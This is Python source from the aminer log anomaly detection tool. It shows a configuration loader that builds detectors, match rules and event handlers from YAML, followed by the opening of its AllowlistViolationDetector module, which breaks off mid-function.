analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(item['path'], parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'PCADetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], window_size=item['window_size'], min_anomaly_score=item['min_anomaly_score'], min_variance=item['min_variance'], num_windows=item['num_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'NewMatchPathValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline']) elif item['type'].name == 'MissingMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline']) elif item['type'].name == 'MissingMatchPathListValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['path'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline']) elif item['type'].name == 'EventSequenceDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], seq_len=item['seq_len'], learn_mode=learn, timeout=item['timeout'], allow_missing_id=item['allow_missing_id'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'ValueRangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'CharsetDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'EntropyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], prob_thresh=item['prob_thresh'], default_freqs=item['default_freqs'], skip_repetitions=item['skip_repetitions'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'EventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], unique_path_list=item['unique_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], empty_window_warnings=item['empty_window_warnings'], early_exceeding_anomaly_output=item['early_exceeding_anomaly_output'], set_lower_limit=item['set_lower_limit'], set_upper_limit=item['set_upper_limit'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'EventCountClusterDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], persistence_id=item['persistence_id'], id_path_list=item['id_path_list'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], idf=item['idf'], norm=item['norm'], add_normal=item['add_normal'], check_empty_windows=item['check_empty_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'TimeCorrelationDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['parallel_check_count'], persistence_id=item['persistence_id'], record_count_before_event=item['record_count_before_event'], output_logline=item['output_logline'], use_path_match=item['use_path_match'], use_value_match=item['use_value_match'], min_rule_attributes=item['min_rule_attributes'], max_rule_attributes=item['max_rule_attributes']) elif item['type'].name == 'ParserCount': tmp_analyser = func( analysis_context.aminer_config, item['paths'], anomaly_event_handlers, report_interval=item['report_interval'], target_label_list=item['labels'], split_reports_flag=item['split_reports_flag']) elif item['type'].name == 'EventCorrelationDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], max_hypotheses=item['max_hypotheses'], hypothesis_max_delta_time=item['hypothesis_max_delta_time'], generation_probability=item['generation_probability'], generation_factor=item['generation_factor'], max_observations=item['max_observations'], p0=item['p0'], alpha=item['alpha'], candidates_size=item['candidates_size'], hypotheses_eval_delta_time=item['hypotheses_eval_delta_time'], constraint_list=item['constraint_list'], delta_time_to_discard_hypothesis=item['delta_time_to_discard_hypothesis'], check_rules_flag=item['check_rules_flag'], learn_mode=learn, ignore_list=item['ignore_list'], persistence_id=item['persistence_id']) elif item['type'].name == 'NewMatchIdValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, id_path_list=item['id_path_list'], min_allowed_time_diff=item['min_allowed_time_diff'], learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline']) elif item['type'].name == 'SlidingEventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], set_upper_limit=item['set_upper_limit'], local_maximum_threshold=item['local_maximum_threshold'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'LinearNumericBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'ModuloTimeBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['modulo_value'], item['time_unit'], item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'HistogramAnalysis': histogram_definitions = [] for histogram_definition in item['histogram_defs']: if len(histogram_definition) != 2: msg = 'Every item of the histogram_definitions must have an size of 2!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if histogram_definition[1] not in analysis_dict: msg = f'{histogram_definition[1]} first must be defined before used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) histogram_definitions.append([histogram_definition[0], analysis_dict[histogram_definition[1]]]) tmp_analyser = func(analysis_context.aminer_config, histogram_definitions, item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'PathDependentHistogramAnalysis': if item['bin_definition'] not in analysis_dict: msg = f'{item["bin_definition"]} first must be defined before used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, item['path'], analysis_dict[item['bin_definition']], item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'EnhancedNewMatchPathValueComboDetector': tuple_transformation_function = None if item['tuple_transformation_function'] == 'demo': tuple_transformation_function = tuple_transformation_function_demo_print_every_10th_value tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], learn_mode=learn, tuple_transformation_function=tuple_transformation_function, output_logline=item['output_logline']) # skipcq: PYL-W0603 global enhanced_new_match_path_value_combo_detector_reference enhanced_new_match_path_value_combo_detector_reference = tmp_analyser elif item['type'].name == 'MatchFilter': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, target_value_list=item['value_list'], output_logline=item['output_logline']) elif item['type'].name == 'MatchValueAverageChangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['timestamp_path'], item['paths'], item['min_bin_elements'], item['min_bin_time'], debug_mode=item['debug_mode'], persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'MatchValueStreamWriter': stream = sys.stdout if item['stream'] == 'sys.stderr': stream = sys.stderr tmp_analyser = func(stream, item['paths'], item['separator'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace( b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b"), item['missing_value_string'].encode().replace( b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b")) elif item['type'].name == 'NewMatchPathDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline']) elif 'MatchAction' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if item['type'].name == 'EventGenerationMatchAction': tmp_analyser = func(item['event_type'], item['event_message'], anomaly_event_handlers) elif item['type'].name == 'AtomFilterMatchAction': if 'subhandler_list' in item: tmp_analyser = func([analysis_context.get_component_by_name(component) for component in item['subhandler_list']], stop_when_handled_flag=item['stop_when_handled_flag']) if item['delete_components']: for component_name in item['subhandler_list']: component = analysis_context.get_component_by_name(component_name) for i, val in enumerate(atom_filter.subhandler_list): if val[0] == component: del atom_filter.subhandler_list[i] break else: tmp_analyser = func([handler for handler, stop_when_handled_flag in atom_filter.subhandler_list], stop_when_handled_flag=item['stop_when_handled_flag']) match_action_dict[comp_name] = tmp_analyser continue elif 'MatchRule' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = None if item['match_action'] is not None: if item['match_action'] not in match_action_dict: msg = f'The match action {item["match_action"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = match_action_dict[item['match_action']] if item['type'].name in ('AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'): sub_rules = [] for sub_rule in item['sub_rules']: if sub_rule not in match_rules_dict: msg = f'The sub match rule {sub_rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rules.append(match_rules_dict[sub_rule]) tmp_analyser = func(sub_rules, match_action=match_action) if item['type'].name == 'ValueDependentDelegatedMatchRule': rule_lookup_dict = {} for key, rule in item['rule_lookup_dict'].items(): if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) rule_lookup_dict[ast.literal_eval(key)] = match_rules_dict[rule] tmp_analyser = func( item['paths'], rule_lookup_dict, default_rule=item['default_rule'], match_action=match_action) if item['type'].name == 'NegationMatchRule': if item['sub_rule'] not in match_rules_dict: msg = f'The match rule {item["sub_rule"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rule = match_rules_dict[item['sub_rule']] tmp_analyser = func(sub_rule, match_action=match_action) if item['type'].name in ('PathExistsMatchRule', 'IPv4InRFC1918MatchRule'): tmp_analyser = func(item['path'], match_action=match_action) if item['type'].name == 'ValueMatchRule': if isinstance(item['value'], str): item['value'] = item['value'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") tmp_analyser = func(item['path'], item['value'], match_action=match_action) if item['type'].name == 'ValueListMatchRule': value_list = [] for val in item['value_list']: if isinstance(val, str): val = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") value_list.append(val) tmp_analyser = func(item['path'], value_list, match_action=match_action) if item['type'].name == 'ValueRangeMatchRule': tmp_analyser = func(item['path'], item['lower_limit'], item['upper_limit'], match_action) if item['type'].name == 'StringRegexMatchRule': import re tmp_analyser = func(item['path'], re.compile(item['regex'].encode()), match_action=match_action) if item['type'].name == 'ModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. tmp_analyser = func(item['path'], item['seconds_modulo'], item['lower_limit'], item['upper_limit'], match_action=match_action) if item['type'].name == 'ValueDependentModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. limit_lookup_dict = {} for key in item['limit_lookup_dict'].keys(): if isinstance(key, str): limit_lookup_dict[key.encode()] = item['limit_lookup_dict'][key] else: limit_lookup_dict[key] = item['limit_lookup_dict'][key] tmp_analyser = func(item['path'], item['seconds_modulo'], item['paths'], limit_lookup_dict, default_limit=item['default_limit'], match_action=match_action) if item['type'].name == 'DebugMatchRule': tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) if item['type'].name == 'DebugHistoryMatchRule': # object_history is not supported yet.. tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) match_rules_dict[comp_name] = tmp_analyser continue elif item['type'].name == 'CorrelationRule': artefact_match_parameters = [] for match_parameters in item['artefact_match_parameters']: artefact_match_parameters.append(tuple(i for i in match_parameters)) tmp_analyser = func(item['rule_id'], item['min_time_delta'], item['max_time_delta'], artefact_match_parameters=artefact_match_parameters) correlation_rules[item['rule_id']] = tmp_analyser continue elif item['type'].name == 'EventClassSelector': if item['artefact_a_rules'] is None and item['artefact_b_rules'] is None: msg = 'At least one of the EventClassSelector\'s rules must not be None!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules = None artefact_b_rules = None if item['artefact_a_rules'] is not None: artefact_a_rules = [] for rule in item['artefact_a_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules.append(correlation_rules[rule]) if item['artefact_b_rules'] is not None: artefact_b_rules = [] for rule in item['artefact_b_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_b_rules.append(correlation_rules[rule]) tmp_analyser = func(item['action_id'], artefact_a_rules, artefact_b_rules) match_action_dict[item['action_id']] = tmp_analyser continue elif item['type'].name == 'TimeCorrelationViolationDetector': ruleset = [] for rule in item['ruleset']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) ruleset.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, ruleset, anomaly_event_handlers, persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'TimestampsUnsortedDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, exit_on_error_flag=item['exit_on_error_flag'], output_logline=item['output_logline']) elif item['type'].name == 'AllowlistViolationDetector': allowlist_rules = [] for rule in item['allowlist_rules']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) allowlist_rules.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=item['output_logline']) elif item['type'].name == 'EventTypeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], id_path_list=item['id_path_list'], allow_missing_id=item['allow_missing_id'], allowed_id_tuples=item['allowed_id_tuples'], min_num_vals=item['min_num_vals'], max_num_vals=item['max_num_vals'], save_values=item['save_values']) elif item['type'].name == 'VariableTypeDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], gof_alpha=item['gof_alpha'], s_gof_alpha=item['s_gof_alpha'], s_gof_bt_alpha=item['s_gof_bt_alpha'], d_alpha=item['d_alpha'], d_bt_alpha=item['d_bt_alpha'], div_thres=item['div_thres'], sim_thres=item['sim_thres'], indicator_thres=item['indicator_thres'], num_init=item['num_init'], num_update=item['num_update'], num_update_unq=item['num_update_unq'], num_s_gof_values=item['num_s_gof_values'], num_s_gof_bt=item['num_s_gof_bt'], num_d_bt=item['num_d_bt'], num_pause_discrete=item['num_pause_discrete'], num_pause_others=item['num_pause_others'], test_gof_int=item['test_gof_int'], num_stop_update=item['num_stop_update'], silence_output_without_confidence=item['silence_output_without_confidence'], silence_output_except_indicator=item['silence_output_except_indicator'], num_var_type_hist_ref=item['num_var_type_hist_ref'], num_update_var_type_hist_ref=item['num_update_var_type_hist_ref'], num_var_type_considered_ind=item['num_var_type_considered_ind'], num_stat_stop_update=item['num_stat_stop_update'], num_updates_until_var_reduction=item['num_updates_until_var_reduction'], var_reduction_thres=item['var_reduction_thres'], num_skipped_ind_for_weights=item['num_skipped_ind_for_weights'], num_ind_for_weights=item['num_ind_for_weights'], used_multinomial_test=item['used_multinomial_test'], use_empiric_distr=item['use_empiric_distr'], used_range_test=item['used_range_test'], range_alpha=item['range_alpha'], range_threshold=item['range_threshold'], range_limits_factor=item['range_limits_factor'], num_reinit_range=item['num_reinit_range'], dw_alpha=item['dw_alpha'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn) elif item['type'].name == 'VariableCorrelationDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], num_init=item['num_init'], num_update=item['num_update'], disc_div_thres=item['disc_div_thres'], num_steps_create_new_rules=item['num_steps_create_new_rules'], num_upd_until_validation=item['num_upd_until_validation'], num_end_learning_phase=item['num_end_learning_phase'], check_cor_thres=item['check_cor_thres'], check_cor_prob_thres=item['check_cor_prob_thres'], check_cor_num_thres=item['check_cor_num_thres'], min_values_cors_thres=item['min_values_cors_thres'], new_vals_alarm_thres=item['new_vals_alarm_thres'], num_bt=item['num_bt'], alpha_bt=item['alpha_bt'], used_homogeneity_test=item['used_homogeneity_test'], alpha_chisquare_test=item['alpha_chisquare_test'], max_dist_rule_distr=item['max_dist_rule_distr'], used_presel_meth=item['used_presel_meth'], intersect_presel_meth=item['intersect_presel_meth'], percentage_random_cors=item['percentage_random_cors'], match_disc_vals_sim_tresh=item['match_disc_vals_sim_tresh'], exclude_due_distr_lower_limit=item['exclude_due_distr_lower_limit'], match_disc_distr_threshold=item['match_disc_distr_threshold'], used_cor_meth=item['used_cor_meth'], used_validate_cor_meth=item['used_validate_cor_meth'], validate_cor_cover_vals_thres=item['validate_cor_cover_vals_thres'], validate_cor_distinct_thres=item['validate_cor_distinct_thres'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn) elif item['type'].name == 'PathValueTimeIntervalDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], ignore_list=item['ignore_list'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], time_period_length=item['time_period_length'], max_time_diff=item['max_time_diff'], num_reduce_time_list=item['num_reduce_time_list'], learn_mode=learn) elif item['type'].name == 'PathArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], output_logline=item['output_logline'], learn_mode=learn, num_init=item['num_init'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], alpha=item['alpha'], alpha_bt=item['alpha_bt'], num_results_bt=item['num_results_bt'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_periods_tsa_ini=item['num_periods_tsa_ini']) elif item['type'].name == 'TSAArimaDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], waiting_time=item['waiting_time'], num_sections_waiting_time=item['num_sections_waiting_time'], target_path_list=item['paths'], acf_pause_interval_percentage=item['acf_pause_interval_percentage'], acf_auto_pause_interval=item['acf_auto_pause_interval'], acf_auto_pause_interval_num_min=item['acf_auto_pause_interval_num_min'], build_sum_over_values=item['build_sum_over_values'], num_periods_tsa_ini=item['num_periods_tsa_ini'], num_division_time_step=item['num_division_time_step'], alpha=item['alpha'], num_min_time_history=item['num_min_time_history'], num_max_time_history=item['num_max_time_history'], num_results_bt=item['num_results_bt'], alpha_bt=item['alpha_bt'], acf_threshold=item['acf_threshold'], round_time_interval_threshold=item['round_time_interval_threshold'], force_period_length=item['force_period_length'], set_period_length=item['set_period_length'], min_log_lines_per_time_step=item['min_log_lines_per_time_step'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], learn_mode=learn) elif item['type'].name == 'MinimalTransitionTimeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], target_path_list=item['paths'], id_path_list=item['id_path_list'], ignore_list=item['ignore_list'], allow_missing_id=item['allow_missing_id'], num_log_lines_solidify_matrix=item['num_log_lines_solidify_matrix'], time_output_threshold=item['time_output_threshold'], anomaly_threshold=item['anomaly_threshold']) elif item["type"].name in ("VerboseUnparsedAtomHandler", "SimpleUnparsedAtomHandler"): has_unparsed_handler = True stop_when_handled_flag = True if item["type"].name == "VerboseUnparsedAtomHandler": tmp_analyser = func(anomaly_event_handlers, parsing_model) else: tmp_analyser = func(anomaly_event_handlers) analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.subhandler_list[0] = (tmp_analyser, stop_when_handled_flag) continue else: tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn) if item['output_event_handlers'] is not None: tmp_analyser.output_event_handlers = item['output_event_handlers'] analysis_context.register_component(tmp_analyser, component_name=comp_name) atom_filter.add_handler(tmp_analyser, stop_when_handled_flag=stop_when_handled_flag) add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) def add_default_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model): """Add the default unparsed atom handler and/or NewMatchPathDetector if none is configured.""" if not has_unparsed_handler: from aminer.analysis.UnparsedAtomHandlers import VerboseUnparsedAtomHandler atom_filter.add_handler(VerboseUnparsedAtomHandler(anomaly_event_handlers, parsing_model), stop_when_handled_flag=True) has_unparsed_handler = True if not has_new_match_path_handler: has_new_match_path_handler = True if 'LearnMode' in yaml_data: learn = yaml_data['LearnMode'] else: learn = True from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector nmpd = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn) nmpd.output_event_handlers = None analysis_context.register_component(nmpd, component_name='DefaultNewMatchPathDetector') atom_filter.add_handler(nmpd) return has_new_match_path_handler, has_unparsed_handler def build_event_handlers(analysis_context, anomaly_event_handlers): """Build the event handlers.""" import os import stat try: event_handler_id_list = [] if 'EventHandlers' in yaml_data and yaml_data['EventHandlers'] is not None: for item in yaml_data['EventHandlers']: if item['id'] in event_handler_id_list: raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in EventHandlers!') event_handler_id_list.append(item['id']) func = item['type'].func ctx = None if item['type'].name == 'StreamPrinterEventHandler': if 'output_file_path' in item: try: mode = 'w+' if os.path.exists(item['output_file_path']) and stat.S_ISFIFO(os.stat(item['output_file_path']).st_mode): mode = 'w' stream = open(item['output_file_path'], mode) ctx = func(analysis_context, stream) except OSError as e: msg = f'Error occured when opening stream to output_file_path {item["output_file_path"]}. Error: {e}' logging.getLogger(DEBUG_LOG_NAME).error(msg) print(msg, file=sys.stderr) else: ctx = func(analysis_context) if item['type'].name == 'DefaultMailNotificationEventHandler': ctx = func(analysis_context) if item['type'].name == 'SyslogWriterEventHandler': ctx = func(analysis_context, item['instance_name']) if item['type'].name == 'KafkaEventHandler': import configparser config = configparser.ConfigParser() if os.access(item['cfgfile'], os.R_OK): config.read(item['cfgfile']) else: msg = f'{item["cfgfile"]} does not exist or is not readable' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) options = dict(config.items("DEFAULT")) for key, val in options.items(): try: if key == "sasl_plain_username": continue options[key] = int(val) except ValueError: # skipcq: FLK-E722 pass ctx = func(analysis_context, item['topic'], options) if item['type'].name == 'ZmqEventHandler': # if topic is "None" zmq will send messages without using any topic if 'topic' not in item: item['topic'] = None ctx = func(analysis_context, item['topic'], item['url']) if ctx is None: ctx = func(analysis_context) if item['json'] is True or item['type'].name == 'KafkaEventHandler' or item['type'].name == 'ZmqEventHandler': from aminer.events.JsonConverterHandler import JsonConverterHandler if item['pretty'] is True: ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=True) else: ctx = JsonConverterHandler([ctx], analysis_context, pretty_print=False) if item['score']: from aminer.events.ScoringEventHandler import ScoringEventHandler ctx = ScoringEventHandler([ctx], analysis_context, weights=item['weights'], auto_weights=item['auto_weights'], auto_weights_history_length=item['auto_weights_history_length']) anomaly_event_handlers.append(ctx) return event_handler_id_list raise KeyError() except KeyError: # Add stdout stream printing for debugging, tuning. from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context, stream=sys.stderr)) return None def tuple_transformation_function_demo_print_every_10th_value(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector_reference.known_values_dict.get(tuple(match_value_list), None) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector_reference.learn_mode = False else: enhanced_new_match_path_value_combo_detector_reference.learn_mode = True return match_value_list def parse_json_yaml(json_dict, parser_model_dict): """Parse an yaml configuration for json.""" key_parser_dict = {} for key in json_dict.keys(): value = json_dict[key] if key is None: key = 'null' if key is False: key = 'false' if key is True: key = 'true' if isinstance(value, dict): key_parser_dict[key] = parse_json_yaml(value, parser_model_dict) elif isinstance(value, list): key_parser_dict[key] = [] for val in value: if isinstance(val, dict): key_parser_dict[key].append(parse_json_yaml(val, parser_model_dict)) elif val in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"): if len(value) > 1 and val == "ALLOW_ALL": msg = "ALLOW_ALL must not be combined with other parsers in lists." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) key_parser_dict[key] = value elif parser_model_dict.get(val) is None: msg = f'The parser model {val} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) else: key_parser_dict[key].append(parser_model_dict.get(val)) elif value in ("ALLOW_ALL", "EMPTY_ARRAY", "EMPTY_OBJECT", "NULL_OBJECT"): key_parser_dict[key] = value elif parser_model_dict.get(value) is None: msg = f'The parser model {value} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) else: key_parser_dict[key] = parser_model_dict.get(value) return key_parser_dict logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/__init__.py000066400000000000000000000000001437606560100313060ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/000077500000000000000000000000001437606560100310325ustar00rootroot00000000000000AllowlistViolationDetector.py000066400000000000000000000065531437606560100366670ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for log atoms not matching any allowlisted rule. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class AllowlistViolationDetector(AtomHandlerInterface): """ Objects of this class handle a list of allowlist rules. They ensure, that each received log-atom is at least covered by a single allowlist rule. To avoid traversing the complete rule tree more than once, the allowlist rules may have match actions attached that set off an alarm by themselves. """ def __init__(self, aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=True): """ Initialize the detector. @param allowlist_rules list of rules executed until the first rule matches. """ super().__init__(aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, output_logline=output_logline, allowlist_rules=allowlist_rules) def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. @param log_atom atom with parsed data to check @return a boolean value if the log atom matches one of the rules. """ self.log_total += 1 event_data = {} for rule in self.allowlist_rules: if 